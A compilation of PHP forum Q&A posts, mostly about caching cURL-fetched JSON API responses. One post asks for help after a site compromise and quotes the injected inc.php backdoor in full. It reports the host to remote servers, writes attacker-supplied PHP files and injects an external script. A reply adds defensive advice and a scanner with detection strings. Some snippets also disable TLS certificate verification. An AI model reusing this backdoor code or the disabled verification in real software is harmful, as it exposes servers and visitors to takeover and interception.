I have spent a couple of hours reading up on this, but so far I have found no clear solution. I am using WAMP as my local server, and I have a successful API call set up that returns data.
I would like to store that data locally, thus reducing the number of API calls being made.
For simplicity I created a cache.json file in the same folder as my PHP scripts, and when I run the process I can see the file has been accessed, as its timestamp updates.
But the file remains empty.
Based on my research I suspect the issue may come down to permissions; I have gone through the folders and files and unchecked read-only, etc.
I would appreciate it if someone could validate that my code is correct and, if it is, hopefully point me in the direction of a solution.
Many thanks.
<?php
$url = 'https://restcountries.eu/rest/v2/name/' . $_REQUEST['country'];
$cache = __DIR__ . "/cache.json"; // make this file in same dir
$force_refresh = true; // dev
$refresh = 60; // once a min (set short time frame for testing)
// cache json results so as to not over-query (api restrictions)
if ($force_refresh || ((time() - filectime($cache)) > $refresh || 0 == filesize($cache))) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_URL, $url);
    $result = curl_exec($ch);
    curl_close($ch);
    $decode = json_decode($result, true); // NB: json_decode(..., true) returns an array
    $handle = fopen($cache, 'w'); // or die('no fopen');
    $json_cache = $decode;
    fwrite($handle, $json_cache); // fwrite() expects a string, but $json_cache is an array here
    fclose($handle);
} else {
    $json_cache = file_get_contents($cache); // locally
}
echo json_encode($json_cache, JSON_UNESCAPED_UNICODE);
?>
I managed to solve this by using file_put_contents(). Not being an expert, I do not understand why this works while the code above doesn't, but maybe this helps someone else.
Adjusted code:
<?php
$url = 'https://restcountries.eu/rest/v2/name/' . $_REQUEST['country'];
$cache = __DIR__ . "/cache.json"; // make this file in same dir
$force_refresh = false; // dev
$refresh = 60; // once a min (short time frame for testing)
// cache json results so as to not over-query (api restrictions)
if ($force_refresh || ((time() - filectime($cache)) > $refresh || 0 == filesize($cache))) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_URL, $url);
    $result = curl_exec($ch);
    curl_close($ch);
    $decode = json_decode($result, true);
    // the earlier fwrite() failed because it was handed the decoded array;
    // file_put_contents() gets the raw JSON string instead
    $json_cache = $result;
    file_put_contents($cache, $json_cache);
} else {
    $json_cache = file_get_contents($cache); // locally
    $decode = json_decode($json_cache, true);
}
echo json_encode($decode, JSON_UNESCAPED_UNICODE);
?>
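For what it's worth, here is a slightly more defensive variant of the same idea (just a sketch: it checks file_exists() first, since filectime() warns if cache.json doesn't exist yet, uses filemtime() so the age check tracks the last write, and only overwrites the cache when cURL actually returned something):
<?php
$url = 'https://restcountries.eu/rest/v2/name/' . $_REQUEST['country'];
$cache = __DIR__ . '/cache.json';
$refresh = 60; // seconds

$stale = !file_exists($cache)
    || (time() - filemtime($cache)) > $refresh
    || filesize($cache) == 0;

if ($stale) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($ch);
    curl_close($ch);
    if ($result !== false) {
        file_put_contents($cache, $result); // only overwrite on a successful fetch
        $json_cache = $result;
    } else {
        // fall back to whatever is cached, if anything
        $json_cache = file_exists($cache) ? file_get_contents($cache) : 'null';
    }
} else {
    $json_cache = file_get_contents($cache);
}
echo json_encode(json_decode($json_cache, true), JSON_UNESCAPED_UNICODE);
?>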
Someone uploaded this script to our server:
https://github.com/mIcHyAmRaNe/wso-webshell
And we have found inc.php files in different directories on our server. The inc.php file has this code in it:
<?php
error_reporting(0);
$s='http://a1b2cd.club/';
$host = str_replace('www.', '', @$_SERVER['HTTP_HOST']);
$x = $s.'l-'.base64_encode($host);
if(function_exists('curl_init'))
{
$ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
@$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
@$gitt = file_get_contents($x);
}
echo $gitt;
if(isset($_GET['ksfg'])){
$f=fopen($_GET['ksfg'].'.php','a');
fwrite($f,file_get_contents($s.'s-'.$_GET['ksfg']));
fclose($f);
}
echo '<!DOCTYPE html!>';
?><?php
function GetIP(){
if(getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} elseif(getenv("HTTP_X_FORWARDED_FOR")) {
$ip = getenv("HTTP_X_FORWARDED_FOR");
if (strstr($ip, ',')) {
$tmp = explode (',', $ip);
$ip = trim($tmp[0]);
}
} else {
$ip = getenv("REMOTE_ADDR");
}
return $ip;
}
$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(function_exists('curl_init'))
{
$ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
@$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
@$gitt = file_get_contents($x);
}
?>
</marquee><script src=http://expoilt.com/ccb.js></script>
No idea what this script has done to our server. As our server is hosted, should we create a new instance? Or should we suspend the cPanel account from WHM, create a new one, and copy each and every file over? Please help me understand what this code could actually do.
If you get hacked, first change all the passwords, then recheck the code you added yourself against the original version from before the third party got into your site (maybe take the site offline while you check). There is likely a defect somewhere that allowed the third party to upload whatever they wanted to your site, and that has to be fixed.
Regarding the added code: it essentially reports your site's contents and IPs to a remote host (and injects some redirects, which is very dangerous for regular users). What the third party intends to do beyond that, nobody can say; once an outsider gains admin privileges, they can effectively act as the site's owner.
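As a starting point for that recheck, here is a rough sketch (hedged: the path and the string patterns are assumptions based on the injected code above, and this is no substitute for a proper malware scan) that walks the docroot and flags PHP files containing those markers:
<?php
// Rough sketch: walk a directory tree and flag PHP files that contain
// markers from the injected code. Path and patterns are assumptions.
$root = '/home/youraccount/public_html';
$patterns = array('a1b2cd.club', 'byr00t.co', 'wso-webshell', 'ksfg', 'base64_decode');

$iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root));
foreach ($iter as $file) {
    if ($file->isFile() && strtolower($file->getExtension()) === 'php') {
        $code = file_get_contents($file->getPathname());
        foreach ($patterns as $needle) {
            if (stripos($code, $needle) !== false) {
                echo $file->getPathname() . " contains '" . $needle . "'\n";
                break; // one report per file is enough
            }
        }
    }
}
Note that 'base64_decode' will also match legitimate code, so treat the output as a list of files to inspect, not a verdict.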
<?php
if (isset($_POST["submit"])) {
    $adm = $_POST["admno"];
    $phn = $_POST["phn1"];
    include("model.php");
    $db = new database;
    $r = $db->register($adm);
    while ($row = mysql_fetch_array($r)) {
        if ($row["phn_no1"] == $phn || $row["phn_no2"] == $phn || $row["phn_no3"] == $phn) {
            $formatted = "" . substr($phn, 6, 10) . " ";
            $password = $formatted + $adm; // NB: '+' is numeric addition in PHP; '.' concatenates strings
            echo $password;
            $db->setpassword($adm, $password);
            $pre = 'PREFIX';
            $suf = '%20ThankYou';
            $sms = $pre . $password . $suf;
            session_start();
            $ch = curl_init("http://www.perfectbulksms.in/Sendsmsapi.aspx?USERID=ID&PASSWORD=PASS&SENDERID=SID&TO=$phn&MESSAGE=$sms");
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_AUTOREFERER, true);
            $result = curl_exec($ch);
            curl_close($ch);
            header("Location: password.php?msg=new");
        } else {
            header("Location: register.php?msg=invalid");
        }
    }
}
?>
This code works perfectly on my localhost, but when I put it on the server it takes a lot of time, and the cURL call does not work; the script only redirects to the next page. I checked that cURL is enabled. If I use only the SMS API, without the cURL command, it sends the SMS immediately, but I want to run both the header() redirect and also hide my SMS API credentials. Is there any alternative to this?
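One thing worth trying (a sketch under assumptions, not a guaranteed fix; $smsUrl here stands for the Sendsmsapi.aspx URL built above): give cURL explicit timeouts so a slow SMS gateway cannot stall the script for long, log a failure instead of blocking the user, and only then issue the redirect.
$ch = curl_init($smsUrl); // $smsUrl: the gateway URL from above (with no spaces in it)
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); // give up connecting after 5 seconds
curl_setopt($ch, CURLOPT_TIMEOUT, 10);       // give up entirely after 10 seconds
$result = curl_exec($ch);
if ($result === false) {
    error_log('SMS send failed: ' . curl_error($ch)); // log it rather than blocking the user
}
curl_close($ch);
header("Location: password.php?msg=new");
exit; // stop the script so nothing runs after the redirect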
So I'm trying to figure out why this PHP code takes so long to output its results.
For example, this is my apitest.php, and here is my PHP code:
<?php
function getRankedMatchHistory($summonerId, $serverName, $apiKey) {
    // (PHP does not require variable declarations; the bare
    // $k; $d; $a; ... lines that used to sit here were unnecessary)
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://".$serverName.".api.pvp.net/api/lol/".$serverName."/v2.2/matchhistory/".$summonerId."?api_key=".$apiKey);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response = curl_exec($ch);
    curl_close($ch);
    // json_decode() returns a plain PHP array: the whole response is held
    // locally in $matchHistory, and nothing is re-requested when it is read
    $matchHistory = json_decode($response, true);
    for ($i = 9; $i >= 0; $i--) {
        $farm1 = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["minionsKilled"];
        $farm2 = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["neutralMinionsKilled"];
        $farm3 = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["neutralminionsKilledTeamJungle"];
        $farm4 = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["neutralminionsKilledEnemyJungle"];
        $elapsedTime = $matchHistory["matches"][$i]["matchDuration"];
        settype($elapsedTime, "integer");
        $elapsedTime = floor($elapsedTime / 60);
        $k = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["kills"];
        $d = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["deaths"];
        $a = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["assists"];
        $championIdTmp = $matchHistory["matches"][$i]["participants"]["0"]["championId"];
        $championName = call_user_func('getChampionName', $championIdTmp); // calls another function to resolve championId into championName
        $gameType = preg_replace('/[^A-Za-z0-9\-]/', ' ', $matchHistory["matches"][$i]["queueType"]);
        $result = (($matchHistory["matches"][$i]["participants"]["0"]["stats"]["winner"]) == "true") ? "Victory" : "Defeat";
        echo "<tr>"."<td>".$gameType."</td>"."<td>".$result."</td>"."<td>".$championName."</td>"."<td>".$k."/".$d."/".$a."</td>"."<td>".($farm1+$farm2+$farm3+$farm4)." in ".$elapsedTime." minutes"."</td>"."</tr>";
    }
}
?>
What I'd like to know is how to make the page output faster, as it currently takes around 10-15 seconds to produce the results, which makes the browser think the website is dead, as if it hit a 500 Internal Server Error or something like it.
Here is a simple demonstration of how long it can take: Here
As you might have noticed, yes, I'm using the Riot API, which sends the response JSON-encoded.
Here is an example of the response that this function handles: Here
What I thought of was creating a temporary file called temp.php at the start of the cURL function, saving the whole response there, and then reading the variables from there to speed up the process; after reading the variables it would delete temp.php, freeing up disk space.
But I have no idea how to do that in PHP only.
By the way, I'd like to mention that I just started using PHP today, so I'd prefer some explanation with the answers if possible.
Thanks for your precious time.
Try benchmarking like this:
// start the timer
$start_curl = microtime(true);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://".$serverName.".api.pvp.net/api/lol/".$serverName."/v2.2/matchhistory/".$summonerId."?api_key=".$apiKey);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// debugging
curl_setopt($ch, CURLOPT_VERBOSE, true);
// start another timer
$start = microtime(true);
$response = curl_exec($ch);
echo 'curl_exec() in: '.(microtime(true) - $start).' seconds<br><br>';
// start another timer
$start = microtime(true);
curl_close($ch);
echo 'curl_close() in: '.(microtime(true) - $start).' seconds<br><br>';
// how long did the entire CURL take?
echo 'CURLed in: '.(microtime(true) - $start_curl).' seconds<br><br>';
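If the curl_exec() timer turns out to dominate, caching the response to a file, roughly as the question itself suggests, is the usual fix. A minimal sketch (assumptions on my part: a five-minute TTL and the system temp directory; adjust both to taste):
// Cache the raw API response per summoner for 5 minutes (a sketch)
$cacheFile = sys_get_temp_dir() . '/match_' . $summonerId . '.json';
if (file_exists($cacheFile) && (time() - filemtime($cacheFile)) < 300) {
    $response = file_get_contents($cacheFile); // fresh enough: skip the API call
} else {
    // ... run the cURL request from above to fill $response ...
    file_put_contents($cacheFile, $response);
}
$matchHistory = json_decode($response, true);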
Got a slight bit of an issue. I've been playing with the Facebook and Twitter APIs and getting the JSON output of status search queries with no problem; however, I've read up further and realised that I could end up being "rate limited", as quoted from the documentation.
I was wondering: is it easy to cache the JSON output each hour so that I can at least try to prevent this from happening? If so, how is it done? I tried a YouTube video, but that only showed how to write the contents of a directory listing to a cache.php file; it didn't really point out whether this can be done with JSON output, and it certainly didn't say how to use a time interval of 60 minutes or how to get the information back out of the cache file.
Any help or code would be very much appreciated, as there seem to be very few tutorials on this sort of thing.
Here is a simple function that adds caching to fetching some URL's contents:
function getJson($url) {
    // cache files are created like cache/abcdef123456...
    $cacheFile = 'cache' . DIRECTORY_SEPARATOR . md5($url);
    if (file_exists($cacheFile)) {
        $fh = fopen($cacheFile, 'r');
        $size = filesize($cacheFile);
        $cacheTime = trim(fgets($fh));
        // if data was cached recently, return cached data
        if ($cacheTime > strtotime('-60 minutes')) {
            return fread($fh, $size);
        }
        // else delete cache file
        fclose($fh);
        unlink($cacheFile);
    }
    $json = file_get_contents($url); // or fetch from Twitter via cURL, as usual
    $fh = fopen($cacheFile, 'w');
    fwrite($fh, time() . "\n");
    fwrite($fh, $json);
    fclose($fh);
    return $json;
}
It uses the URL to identify cache files; a repeated request to the identical URL will be read from the cache the next time. It writes the timestamp into the first line of the cache file, and cached data older than an hour is discarded. It's just a simple example and you'll probably want to customize it.
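For example, hedged usage (it assumes a writable cache/ directory exists next to the script, and the Twitter URL is only a placeholder):
// the first call populates cache/<md5>; calls within the next hour read the file
$tweets = json_decode(getJson('https://api.twitter.com/1.1/search/tweets.json?q=php'), true);
var_dump($tweets);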
It's a good idea to use caching to avoid the rate limit.
Here's some example code showing how I did it for Google+ data, in some PHP I wrote recently.
private function getCache($key) {
    $cache_life = intval($this->instance['cache_life']); // minutes
    if ($cache_life <= 0) return null;
    // fully-qualified filename
    $fqfname = $this->getCacheFileName($key);
    if (file_exists($fqfname)) {
        if (filemtime($fqfname) > (time() - 60 * $cache_life)) {
            // The cache file is fresh.
            $fresh = file_get_contents($fqfname);
            $results = json_decode($fresh, true);
            return $results;
        }
        else {
            unlink($fqfname);
        }
    }
    return null;
}

private function putCache($key, $results) {
    $json = json_encode($results);
    $fqfname = $this->getCacheFileName($key);
    file_put_contents($fqfname, $json, LOCK_EX);
}
and to use it:
// $cacheKey is a value that is unique to the
// concatenation of all params. A string concatenation
// might work.
$results = $this->getCache($cacheKey);
if (!$results) {
    // cache miss; must call out
    $results = $this->getDataFromService(....);
    $this->putCache($cacheKey, $results);
}
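The getCacheFileName() helper referenced above isn't shown; one possible implementation (purely an assumption on my part, not the original) maps each key to a file in the system temp directory:
private function getCacheFileName($key) {
    // hypothetical helper: one cache file per key, keyed by md5 hash
    return sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gp-cache-' . md5($key) . '.json';
}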
I know this post is old, but it shows up in Google, so for everyone looking: I made this simple function that cURLs a JSON URL and caches it in a file inside a specific folder. When the JSON is requested again, if 5 minutes have passed it will cURL the URL again; if the 5 minutes haven't passed yet, it will serve it from the file. It uses a timestamp to track time. Enjoy.
function ccurl($url, $id) {
    // assumes ./private/cache/$id/ already exists
    $path = "./private/cache/$id/";
    $files = array_values(array_diff(scandir($path), array('.', '..')));

    // keep at most one cache file per id
    if (count($files) > 1) {
        foreach ($files as $file) {
            unlink($path . $file);
        }
        $files = array();
    }

    // helper: fetch fresh JSON and cache it under a timestamped filename
    $fetch = function () use ($url, $path) {
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $url);
        curl_setopt($c, CURLOPT_TIMEOUT, 15);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($c, CURLOPT_USERAGENT,
            'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
        $response = curl_exec($c);
        curl_close($c);
        file_put_contents($path . time() . '.json', $response);
        return $response;
    };

    // no cache file yet: fetch and store
    if (empty($files)) {
        return $fetch();
    }

    // the filename is the creation timestamp; refetch if older than 5 minutes
    if (time() - (int) str_replace('.json', '', $files[0]) > 300) {
        unlink($path . $files[0]);
        return $fetch();
    }

    return file_get_contents($path . $files[0]);
}
For usage, create a directory for all cached files (for me it's /private/cache), then create another directory inside it for the request cache, e.g. x. When calling the function it should look like this:
ccurl('json_url', 'x')
where x is the id. If you have questions, please ask me ^_^ Also, enjoy (I might update it later so it doesn't need a directory per id).
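If creating the per-id directory by hand is a nuisance, a small guard at the top of ccurl() would create it on demand (a hypothetical addition on my part, not part of the original function):
// placed before the scandir() call in ccurl():
if (!is_dir($path)) {
    mkdir($path, 0755, true); // create ./private/cache/$id/ recursively
}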
This is my code:
function get_remote_file_to_cache() {
    $sites_array = array("http://www.php.net", "http://www.engadget.com", "http://www.google.se", "http://arstechnica.com", "http://wired.com");
    $the_site = $sites_array[rand(0, 4)];
    $curl = curl_init();
    $fp = fopen("rr.txt", "w");
    curl_setopt($curl, CURLOPT_URL, $the_site);
    curl_setopt($curl, CURLOPT_FILE, $fp);
    curl_exec($curl);
    curl_close($curl);
}
$cache_file = 'rr.txt';
$cache_life = '15'; // caching time, in seconds
$filemtime = @filemtime($cache_file);
if (!$filemtime or (time() - $filemtime >= $cache_life)) {
    ob_start();
    echo file_get_contents($cache_file);
    ob_get_flush();
    echo " <br><br><h1>Writing to cache</h1>";
    get_remote_file_to_cache();
} else {
    echo "<h1>Reading from cache file:</h1><br> ";
    ob_start();
    echo file_get_contents($cache_file);
    ob_get_flush();
}
Everything works as it should, with no problems or surprises, and as you can see it's pretty simple code. But I am new to cURL and would just like to add one check to the code, and I don't know how:
Is there any way to check that the file fetched from the remote site is not a 404 (Not Found) page or similar, but came back with status code 200 (successful)?
So basically: only write to the cache file if the fetch returned status code 200.
Thanks!
To get the status code from a cURL handle, use curl_getinfo after curl_exec:
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
But the cached file will be overwritten when
$fp = fopen("rr.txt", "w");
is called, regardless of the HTTP code. This means that to update the cache only when the status is 200, you need to read the contents into memory, or write to a temporary file, and only then write to the real file if the status is 200.
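A minimal sketch of that approach (assumptions: it keeps your rr.txt cache file, and it buffers the page in memory with CURLOPT_RETURNTRANSFER instead of streaming with CURLOPT_FILE):
function get_remote_file_to_cache() {
    $sites_array = array("http://www.php.net", "http://www.engadget.com", "http://www.google.se", "http://arstechnica.com", "http://wired.com");
    $the_site = $sites_array[rand(0, 4)];

    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $the_site);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); // buffer in memory, not straight to file
    $body = curl_exec($curl);
    $status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    curl_close($curl);

    // only replace the cache when the fetch really succeeded
    if ($status == 200 && $body !== false) {
        file_put_contents('rr.txt', $body);
    }
}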
It is also a good idea to
touch('rr.txt');
before executing cURL, so that the next request that may arrive before the current operation finishes will not also try to fetch the remote page.
Try this after curl_exec:
$httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);